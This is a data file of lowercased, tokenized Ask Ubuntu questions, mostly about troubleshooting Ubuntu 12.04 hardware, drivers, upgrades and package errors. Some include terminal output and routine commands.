130189	should i use 10.04 or 12.04 ?	i heard a lot of things about power regression in linux kernel . after releasing 12.04 lts , most of the issues have been cleared but not all . there is an article on ubuntu which says `` its a mixed one '' .. for some people , its best release in terms of power management and for some , its the same . http : //www.phoronix.com/scan.php ? page=article & item=ubuntu_pangolin_power & num=1 switching hybrid graphics ; its still not as good as in windows . the new unity desktop . etc.. considering all these issues , which should i prefer , 10.04 lts or 12.04 lts ? updated my hardware : lenovo g570 ; intel 2nd gen i5 ; 4gb ddr3 ram ; intel in-build graphics + amd radeon hd 6370m - 1gb i am very much looking for an ubuntu os which is really as good as windows . especially in switching hybrid graphics , installing binaries etc.. update 2 powertop results using 12.04 live cd .
130190	elantech multitouch breaks after sleep and unknown events	edit : i previously thought this was related to mouse , but i have been experiencing these issues without a mouse plugged-in during the past weeks . i therefore rewrote the description . the two-finger scrolling on my ux31 works just fine , but sometimes it stops working , the cause is unknown . multitouch also breaks whenever i go in sleep mode . logging out and back in fixes the issue , till it happens again ( sleep , or the unknown source ) does this sound familiar to anyone here ?
130193	how to import own self created windows keyboard layout ?	is it possible to import an own windows keyboard layout or i need to generate it new ?
130204	numlock do n't stay on	i upgraded from 11.10 to 12.04 and the numlock does n't work to me . i put it on but it go off automatically . i tried a new installation but the problem persist . in 11.10 was working normally . both versions is x86_64 and the keyboard is usb .
130206	how do i install openstack on a minimal machine set for testing and development ?	looking at https : //help.ubuntu.com/community/ubuntucloudinfrastructure , i see three different ways to do this and the third option `` install ubuntu cloud infrastructure from packages : the hard way '' seems like the option for me , but not even basic steps are included in the document . the first option does n't seem to fit my scenario because i do n't want to run a live image because i have a couple machines i 'd like to use if possible -- one beefy for vms and one wimpy for infrastructure services ( if openstack will even work that way , maybe i 'm confusing it with eucalyptus ) i do n't think i can use the second option because i do n't have 10+ machines to set up maas , though that does sound pretty cool . is this a reasonable scenario ? where can i find at least a basic set of steps ?
130208	external mic not working but internal mic works on an acer aspiron ao722	my acer aspiron ao722 netbook give me a lot of problems . my internal microphone is working , when i connect an external microphone ( headset ) it still take input from internal one . in sound settings i ca n't see line-in option in inputs . but there is only internal microphone . i am using ubuntu 12.04 .
130210	how to turn off the pop up notification in 12.04 ?	how can i turn off the pop up notification that comes at the top right corner each time when i get connected to the internet/wi-fi or when the songs in vlc playlist changes ? i 'm using ubuntu 12.04 , gnome classic .
130211	how can i get ubuntu on my old ( verity vl series ) laptop ?	i was cleaning out my old bedroom ( i have n't lived in for 10 years ) and i found my old verity vl series laptop . it had been recovered after a boyfriend had stolen/traded it for his drug habit , and long story short it was recovered but along the line someone could n't get past my bios password so the os was removed completely . it used to run windows 95 but that 's pretty obsolete . i 'd love to run ubuntu on it ( used to have another computer in which i ran ubuntu along side it to try it out ) . the only problem i seem to be having is getting it on there . it has a cd drive , and i downloaded ubuntu desktop , then burned it to a disk using poweriso . i stuck it in and made sure the bios would boot from the cd drive , then the hard drive . it seems to be getting stuck right after it says it is going to load the logo , and now is stuck on selecting a language ... am i on the right track or are these 'getting stuck ' moments signs it would be too much for this laptop ? i really do n't know a lot about it , how big the hard drive is , what video cards are in it , or anything . if anyone can help it would be wonderful ! thanks ! edit : after it was stuck on the language selection , i came to ask the question here . in the time it took me to write this it stated : '' this kernel requires the following features not present on the cpu : pae cmov unable to boot - please use a kernel appropriate for your cpu . '' ? ? ?
130217	how to edit synaptics touchpad values in ubuntu 12.04 ? no xorg.conf file !	after i installed ubuntu 12.04 got some issues with my touchpad . i reported the problem and finally today a guy replied here - https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-synaptics/+bug/992330 it seems that the solution was good because i edited horizhysteresis and verthysteresis using synclient : synclient verthysteresis=48 and synclient horizhysteresis=48 to see if they were really edited i run into terminal synclient and just seen there the values i added . everything is running perfectly till now . but after i restarted ubuntu the values are gone and rolled back to default . a guy told me to edit the xorg.conf file but there is no xorg.conf file in etc/x11 . thanks and hope someone can give me a good solution .
130218	where can i find a simple instruction for installing home version of windows office programs in a ubuntu 12.04 environment	need help in installing windows office in ubuntu environment
130220	minimize thunderbird to tray	i have tried to look for this answer in other questions but there is none that can solve the problem . what i need is this basic steps . start thunderbird and if i want to close it , it minimizes to the system tray ( and does not show in the launcher to avoid having an additional option there ) . if a new mail arrives , it notifies me via the notify-send popups ( even will minimized ) and the new mails appear on the system tray of the email option . when i click this new mails they open thunderbird and show me the new mails . when i mention minimized i mean in this panel . all the other questions regarding thunderbird minimized are not working . update : already tried the thunderbird plugin firetray . the problem with it ( at least in 12.04 for what i am seeing ) is that it minimizes thunderbird forever . you can only see it again if i click on the system tray menu option `` compose new message '' or `` contacts '' ( does not work if i click on `` mail '' option ) . the only option activated with this plugin is to minimize the window when i click on close . if i remove the firetray addon after testing for example 5 times and then restart thunderbird , thunderbird will open the amount of tries i did . this time it opened 5 thunderbird . something like firetray was holding down thunderbird from appearing for each time i tried to open it . so in this particular case firetray is not working or helping , it just minimizes thunderbird but then creates additional problems for it .
130231	tftp server atftpd fails to start	i have installed atftpd on ubuntu 12.04 , but it looks like i can not start the tftp server , and there 's a problem also with the tftpd daemon . with ubuntu 11.10 there was no problem . ureadahead will be reprofiled on next reboot atftpd ( 0.7.dfsg-11 ) wird eingerichtet ... unknown protocol : udp4 with rlinetd , and also as daemon , it does n't work . with ps -afe i see no process . /var/log/syslog says it can not bind to ip address . with option -- bind-adress the atftpd server starts but also does n't work .
130238	sub woofers not working on hp-dv6 on upgrading to 12.04	i have a hp-dv6165tx . in 11.10 to enable the sub woofers i had added this line to the /etc/modprobe.d/alsa-base.conf file options snd-hda-intel model=ref after upgrading to 12.04 i had no sound . so i changed it to options snd-hda-intel model=hp i ended with hp after a lot of trial and errors looking at the /usr/share/doc/alsa-base/driver/hd-audio-models.txt.gz file now my speakers work but the 2 sub woofers are still not working . any workaround to this ?
130243	ubuntu software center and vm	i have installed ubuntu 12.04 on my system after 20 years of windows . i also installed it on a virtual machine . i have noticed that ubuntu restricted extras in the regular system are different from the virtual machine . is this ok ? image 1 is ubuntu 12.04 running inside a virtual machine image 2 is ubuntu 12.04 running from pc
130244	how do i create a multimedia shortcut on a keyboard without multimedia keys ?	is it possible to make a shortcut for the multimedia keys on any other key ? in my case i have only the volume keys on my keyboard , no other keys like e.g . to skip songs . can we have a shorcut to skip a song on another key , or for example on ctrl+vol key ?
130247	how do i change the background image on the `` try ubuntu '' screen ?	when customizing a live cd , how do i change the background image that 's displayed behind the `` install '' window ?
130262	dell inspiron 1300 hangup during boot	i am trying to install ubuntu 12.04 on this machine . it has 256mb ram . i have created a bootable cd but when booting , it stalls on the ubuntu screen with 5 red spots . is this the wrong version for this machine ? any help would be appreciated .
130265	ubuntu 12.04 hangs on login	most of the time when i log in , i after i enter my password , it says login in , and nothing else happens .
130266	apt errors since upgrade to 12.04	i have been searching for a while for solutions and have found [ this ] [ 1 ] . but since there is no feedback from the thread-starter and this is n't the solution to me , i want to ask again . i have update to ubuntu 12.04 and i am using the gnome 3 desktop . after the update i had a couple of error messages from apport-gtk ( or from apport about gtk ? ! ? ) . submitting the error logs gave me some more errors . the system works now but every time i am using apt or aptitude i get the following messages . wowa @ wowapc : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 4 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up initramfs-tools ( 0.99ubuntu13 ) ... update-initramfs : deferring update ( trigger activated ) setting up linux-image-3.2.0-24-generic ( 3.2.0-24.37 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic update-initramfs : generating /boot/initrd.img-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic run-parts : executing /etc/kernel/postinst.d/zz-runlilo 3.2.0-24-generic /boot/vmlinuz-3.2.0-24-generic fatal : no images have been defined . run-parts : /etc/kernel/postinst.d/zz-runlilo exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-24-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-24-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-24-generic ; however : package linux-image-3.2.0-24-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.24.26 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached no apport report written because maxreports has already been reached update-initramfs : generating /boot/initrd.img-3.2.0-24-generic fatal : no images have been defined . run-parts : /etc/initramfs/post-update.d//runlilo exited with return code 1 dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-3.2.0-24-generic linux-image-generic linux-generic initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i hope anyone can help .
130267	ca n't update to ubuntu 12.04 on 11.10	i 'm having problems on updating ubuntu 11.10 to 12.04 , i 've tried to update all possible ways . i'v downloaded ubuntu 12.04 from cd ... but when booting the upgrade option wont appear ... just : install alongside-erase disk and install-other . so after waiting 5 days i thought that be enough to update the mirror for my contry , spain . even though is not showing any upgrade to 12.04 just normal updates ... i 've tried changing the mirrors and changed to main server and luck either ... after googling a bit..i 've found this mirror which does host an upgrade to 12.04 and switched to that mirror with no luck on upgrade either . ftp.halifax.rwth-aachen.de read here and there and tried sudo apt-get update sudo apt-get dist-upgrade and do-release-upgrade no luck with all of them ... .in doing do release upgrade i get : checking for a new ubuntu release unhandled exception in thread started by < bound method metareleasecore.download of < updatemanager.core.metarelease.metareleasecore object at 0x7f03a9f09fd0 > > traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/updatemanager/core/metarelease.py '' , line 261 , in download uri=urllib2.urlopen ( req , timeout=20 ) file `` /usr/lib/python2.7/urllib2.py '' , line 126 , in urlopen return _opener.open ( url , data , timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 394 , in open response = self._open ( req , data ) file `` /usr/lib/python2.7/urllib2.py '' , line 412 , in _open '_open ' , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 372 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 1201 , in http_open return self.do_open ( httplib.httpconnection , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 1174 , in do_open r = h.getresponse ( buffering=true ) file `` /usr/lib/python2.7/httplib.py '' , line 1027 , in getresponse response.begin ( ) file `` /usr/lib/python2.7/httplib.py '' , line 407 , in begin version , status , reason = self._read_status ( ) file `` /usr/lib/python2.7/httplib.py '' , line 365 , in _read_status line = self.fp.readline ( ) file `` /usr/lib/python2.7/socket.py '' , line 447 , in readline data = self._sock.recv ( self._rbufsize ) socket.timeout : timed out ^ctraceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 83 , in < module > time.sleep ( 0.5 ) keyboardinterrupt after doing what jhon suggested i got no network working with ethernet or wireless either . any ideas ? ? i think netroot is what crashed the networking.. ?
130270	where are read permission limits to guest user stored ?	the default guest user ca n't read the home directory and its contents , but it can read the root directory and other directories with the same permissions as home . so , where is this particular limitation specified ?
130271	how to install dependency libtagc0	i want to install noise player ( beatbox 's fork player ) on ubuntu 12.04 , but when i try i get this error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : noise : depends : libtagc0 ( > = 1.5 ) but it is not installable e : unable to correct problems , you have held broken packages . obviously i added the necesary ppa 's sudo add-apt-repository ppa : nemequ/sqlheavy sudo add-apt-repository ppa : elementary-os/daily sudo apt-get update sudo apt-get install noise but ubuntu does not have libtagc0 installed , then i try to install libtagc0 with : sudo apt-get update sudo apt-get install libtagc0-dev but i got a error menssage : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libtagc0-dev i 've tried to fix the broken packages with : sudo apt-get clean sudo apt-get update sudo apt-get upgrade but any command did n't work ! now i just do not know how can i install the dependency ( libtagc0 ) to could install my favorite music player noise ! thanks in advance for any help
130278	touchpad right click does n't work on hp envy 14 beats	i have ubuntu 12.04 lts 64 bits on my hp envy 14 beats . when i try to click with the right click button it does n't work . only works click in the touchpad directly and with usb mouse . 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:01.1 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0105 ] ( rev 09 ) 00:01.2 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0109 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b5 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b5 ) 00:1c.7 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 8 [ 8086:1c1e ] ( rev b5 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 05 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ] [ 1002:6741 ] 09:00.0 network controller [ 0280 ] : intel corporation centrino ultimate-n 6300 [ 8086:4238 ] ( rev 3e ) 0a:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) 0b:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 )
130280	install mac os lion on macbook with existing ubuntu 12.04 dual boot	i do n't usually create my own questions , because i can find what i need through other people 's questions . however , this one does n't seem to be anywhere , except in one place where someone is talking about not using apple hardware . so here it goes . i am using apple hardware . i have a macbook 1,1 with intel core2duo running ubuntu precise pangolin flawlessly . i never considered starting with mac osx and dual-booting because i never liked mac os . now that i 'm realizing that the only way i 'm going to be able to run my daw ( reaper ) nicely and use a firewire recording interface is to run mac osx , i 'm considering it again . i want to go the opposite direction of most people and install mac osx next to an existing ubuntu installation and have a boot menu with refit . i 've installed refit in ubuntu and i 've converted the .dmg file for mac os lion to a .iso file . now , should i mount the .iso in ubuntu and run it there , or burn a dvd and restart ? i 'm trying to gauge how to do this without hurting my existing ubuntu installation . i will of course keep looking for existing answers in the meantime .
130281	how to restore boot folder ?	no laughing ! i just did sudo rm -vr /boot/* . is there a way to restore the content ? just to clarify why i would do this : i have a sd-card with a boot-partition mounted at /media/boot that i wanted to replace . the computer is still running . what are my options ? update ( my solution ) : this might be a little unsatisfactory for future reference , but i simply backed up all my files and then reinstalled ubuntu . important note if you have the same problem : do n't turn off your computer until you have everything backuped
130283	controlling gpu fan without installing ati drivers	i have a radeon hd 6950 and it 's running kinda hot ( not much , 60c ) , but on windows i noticed the fans run faster and the temp is lower . i know i could use aticonfig , and i tried it . i installed the proprietary fglrx driver , at first it looked fine , the gpu temp was lower without any configuration , but then i tried connecting my second monitor , and when i rebooted first it hanged at the login screen saying `` logging in ... '' , then it logged in , but the graphics were all weird ( like with a very broken vga with weird lines and color everywhere , nothing on screen was recognizable ) and keyboard and mouse had no effect . so i uninstalled everything and i am back with the default drivers ( which kinda flicker at login but i can live with that as long as the system is stable ) . is there any other way i could increase the speed of my gpu fan ? maybe installing aticonfig but not the driver ? is it possible ?
130284	login screen restarts while entering password	i am having a problem that only occurred after installing the fglrx proprietary driver through the additional drivers app . the exact same issue is described in this question , however it 's closed . must login twice before entering unity ; first login screen has graphical anomalies when i boot up my computer , once i get to lightdm login screen i will start typing my password , and upon the entering of two of my password characters `` n2 '' the screen will start displaying some corruption in the very top edge of the screen , then after i hit the number 2 , lightdm seems to crash and it will restart and everything is fine , i can login from that point . so the issue is , every time i reboot , i have to login once , allow lightdm to crash and restart , then login as normal . the issue did not occur prior to installing fglrx , and has happened through several reinstalls .
130285	my android phone is n't being detected by ubuntu	this is what i 've got from terminal , looks like it can see the phone as a usb device just fine but is n't showing up under fdisk so i ca n't mount it . it automounts just fine in my vmware windows . and internet tethering works fine while under linux ( have n't tried under windows ) . here 's lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 019 : id 04d9:1135 holtek semiconductor , inc . bus 001 device 003 : id 05ca:18c0 ricoh co. , ltd bus 001 device 004 : id 0489 : e00f foxconn / hon hai foxconn t77h114 bcm2070 [ single-chip bluetooth 2.1 + edr adapter ] bus 003 device 010 : id 04e8:6860 samsung electronics co. , ltd bus 002 device 012 : id 046d : c315 logitech , inc. classic new touch keyboard and here 's sudo fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001ff06 device boot start end blocks id system /dev/sda1 2048 681845797 340921875 7 hpfs/ntfs/exfat /dev/sda2 * 681846784 845686783 81920000 83 linux /dev/sda3 845686784 968566783 61440000 7 hpfs/ntfs/exfat /dev/sda4 968568830 972475081 1953126 5 extended /dev/sda5 968568832 972475081 1953125 82 linux swap / solaris disk /dev/mapper/cryptswap1 : 2000 mb , 2000000000 bytes 255 heads , 63 sectors/track , 243 cylinders , total 3906250 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbe4c2ec7 disk /dev/mapper/cryptswap1 does n't contain a valid partition table
130295	alcatel modem compatibility on ub 12.04	reciently updated to ub12.04 from previous version . when done , my alcatex onetouch x220y 3g modem does not work anymore . how can i fix this ? thanks in advance .
130309	unable to reset default from rhythmbox to banshee since 12.04	since 12.04 update when i click on my favorite radio on this page http : //www.originalsamplesloops-and-music-online.com/musique.informatique/les_radios_de_la_guadeloupe.html it no longer works when i click on `` radio rbi fm guadeloupe ecouter '' . it used to be i clicked on `` ecouter '' and the music would play in banshee . now a window opens and i can only choose `` open with '' `` rhythmbox ( standard ) '' or `` rbi-fm 10.pls '' , neither of which plays the music ! the third choice , `` other ... '' is useless because clicking it does not bring up a list of programs to choose from ! i clicked on gearwheel in top right corner > system settings > `` banshee '' as default for music . shut down computer and restarted . still radio rbi will not play in banshee . also there is a brief , funny sound from my speakers whenever i load that page in firefox ( and intermittently afterwards ) , sounds like door chimes or like the windows `` ca n't do this '' sound . please help !
130312	upgraded to ubuntu 12.04 now wireless does not work .	when i try to install addition driver that is required this error message comes up : - '' sorry , the installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log ''
130318	how do i cross-compile my application for ubuntu 12.04 armhf architecture on a ubuntu 12.04 i386 host ?	i have a large application i have written . i can successfully compile the application in the following scenarios : in a native compilation for the i386 host running ubuntu 12.04 natively on a pandaboard running ubuntu 12.04 ( this takes a long time ) using qemu and a chroot on the host pc for the armhf pandaboard target ( this takes a very long time ) i would like to cross-compile the application on the i386 host to run on a target such as the pandaboard to complete builds in a timely fashion . so far attempts made using the arm-linux-gnueabihf tool chain in the repositories has produced binaries that do not run correctly . at this stage , i have no plans to package the software . what is the recommended way to achieve a successful cross-compile ?
130324	mouse pointer size inconsistent	since installing ubuntu 12.04 , i 've been having a problem with the mouse pointer size . on the desktop , it is quite a bit larger than it should be ( 24 ) , though the different cursors ( editing text , hyperlink hand , etc ) are correct . the size changes to the correct size when the pointer is over some application windows ( gvim , netbeans , firefox ) , but then changes back once it is moved out of the window . there was a similar question here , but the xdefaults solution did not work for me , and i did n't want to try the one requiring editing the icon image . in addition , i 've tried changing the cursor theme using sudo update-alternatives -- config x-cursor-theme as well as using the dconf-editor , but though i can change the theme , the size issue remains . in case it 's relevant , i 'm running on a dual-screen setup with monitor sizes of 2560x1600 and 1920x1080 , using the nvidia video driver . is there another way to control pointer size , or a setting that might be messing it up ? edit : these are the values/options i have for update-alternatives and in dconf-editor . i 'm now wondering if netbeans and firefox are making the mouse pointer smaller than it should be , but i 'm not sure how big 24 should be ... update-alternatives : selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/share/icons/dmz-white/cursor.theme 90 auto mode 1 /etc/x11/cursors/core.theme 30 manual mode 2 /etc/x11/cursors/handhelds.theme 20 manual mode 3 /etc/x11/cursors/redglass.theme 20 manual mode 4 /etc/x11/cursors/whiteglass.theme 20 manual mode * 5 /usr/share/icons/dmz-black/cursor.theme 30 manual mode 6 /usr/share/icons/dmz-white/cursor.theme 90 manual mode dconf-editor : i ca n't post the image since i 'm a new user but the cursor-size is set to 24 and the cursor-theme is dmz-black .
130325	why wo n't wubi start on windows xp ( 32-bit )	i try to start up wubi.exe and nothing ever appears on the screen , i even have taskmanager open and the program just quits after a minute ( not even ) . is this a windows xp 32-bit glitch or error ?
130327	unity on both screens with dual monitors	after going to 12.04 the unity launcher now appears on both of my screens . i have screens configured as one large desktop , so i only want unity on one of the monitors . how can i configure this ?
130338	how do i disable the hibernate option in the power menu ?	i tried reactivating the hibernate option when it was disabled , i tested sudo pm-hibernate and it was ok , but after that when i hibernate this appears `` not enough free swap '' . so i would like to disable the hibernate option again . help !
130345	12.04 lts amd64 post install error : operating system not found .	this is the third time that i 've downloaded and installed ubuntu 12.04 amd64 on my x120e successfully ( using 3 different well formatted usb sticks ) but when i reboot after installation , i get an error saying operating system not found . i have no clue what to do . i simply wish it booted normally . big thanks in advance .
130346	how does the launcher autohide work in 12.04 ?	i 'm an ubuntu noob who just upgraded to 12.04 , and the launcher does n't autohide anymore . i went into appearance and changed it there , and it collapsed as usual , but on mouseover , it did n't open . you could see a dropped shadow at the edge of the screen like it was trying to pop up ? but no dice . is this a known bug that will be corrected in the future or is this something i can fix on my own ? thanks everyone for your time .
130347	how to unlock `` add '' and `` set as default '' in the `` open with '' tab of a files ' properties	in ubuntu 12.04 with unity 2d , it appears as though you can set the default program for any file ( type ) by right-clicking the file - > properties - > open with - > set as default . however the `` set as default '' button ( and the neighboring `` add '' button ) are grayed out . how can i `` ungray '' these two button so as to use them ? i would expect there to be an `` unlock '' button that prompts for my password as there is on the all settings - > user accounts window , but this is not the case .
130364	12.04 , multi screen - dialogs opening on the wrong screen	i 'm using ubuntu 12.04 with a second screen . the laptop screen is where i do most of the work and the second screen is mostly for displaying documentation and things like that . that 's why it 's very annoying when dialogs appear on the external screen even though the program that triggered the dialog is displayed on the laptop screen . is it possible to fix this annoying behaviour ? ideally dialogs should be displayed on the same screen as their parent window , but an acceptable workaround would be to declare my laptop screen as the `` primary '' screen and show all new dialogs there .
130365	can i upgrade from 10.04lts to 12.04lts with the alternate cd ?	i want to upgrade 33 computers from 10.04lts to 12.04lts , but with my internet connection i can not upgrade 33 computers , so i want to upgrade on an offline installation mode , so i have heard about the alternate cd image that is suitable for upgrading , but my question is can i use it on my usb drive for upgrading ? ? ?
130371	12.04 crashing on asus a9rp ?	i 've got an asus a9rp laptop which crashes constantly ( 4 to 6 crashes in 2 hours of use ) , in two different ways : long terminal output on black screen completely graphically messed up , but still running programs and responsive , but you do n't see it . first i used ubuntu 11.10 and then clean install of 12.04 ( both 32bit ) via dvd but the problem persists . i 've also checked the hd via fsck and the memory via memtest for 9 hours , no errors . any ideas ? i am total noob , so ask me if you need more info . is there any way to log error or should i just take a screen shot ? both crashes happened when installing something , but i had the similar crashes when surfing the internet/office programs . here are photos of the output ; first two pictures are one crash and the two others another one
130373	ubuntu 12.04 compiling a c program	i have recently installed ubuntu 12.04 lts 32 bit desktop version and i wrote a computer program where it uses the math.h head , and i keep getting an error saying that it is an undefined reference to 'pow ' . i compliled it using gcc -wall -lm filex.c -o filex.out . i really like this new system but what can be going wrong ? all forums i have looked at just say to compile using -lm which i am . i have compiled the same program in another computer and it works just fine . can someone help ?
130374	ramdisk , compressed , writeable , no swap	i need a ramdisk who handle transparent realtime compression on write and decompression on read . example : i use /dev/shm , or i create a new tmpfs , mount it writeable and compressed . i wrote and read about 500 mb - 1 gb of text files . the files ' content is not fixed , every few seconds the files are updated . so squashfs / zramswap seems not to fit my goal . i wonder about fusecompress or other solutions .
130379	how do i get a atheros communications inc. ar9285 wireless network adapter working ?	hi ask ubuntu my wireless is not working so here is my info : system using : lenovo z570 $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . $ sudo ifconfig eth0 link encap : ethernet hwaddr f0 : de : f1:54:34 : a2 inet addr:192.168.2.2 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :f2de : f1ff : fe54:34a2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:44257 errors:0 dropped:0 overruns:0 frame:0 tx packets:40079 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:43571495 ( 43.5 mb ) tx bytes:4926319 ( 4.9 mb ) interrupt:42 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:5977 errors:0 dropped:0 overruns:0 frame:0 tx packets:5977 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:708983 ( 708.9 kb ) tx bytes:708983 ( 708.9 kb ) wlan0 is not showing in thils , but now when i try to use . $ sudo ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill now when i use this : $ sudo rfkill list all 1 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no then i use command : $ sudo rfkill unblock all then : $ sudo rfkill list all 1 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no here phy0 hard blocked = yes result was the same ( then i again try to switch on/off wifi from keyboard by pressing fn+f5 ) $ sudo rfkill list all 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no now this time phy0 soft blocked = yes as well as hard blocked : yes here is hardwares specs : $ sudo lshw -class network *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 68 : a3 : c4:9a:7e:62 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-24-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f1900000-f190ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 05 serial : f0 : de : f1:54:34 : a2 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.2.2 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : 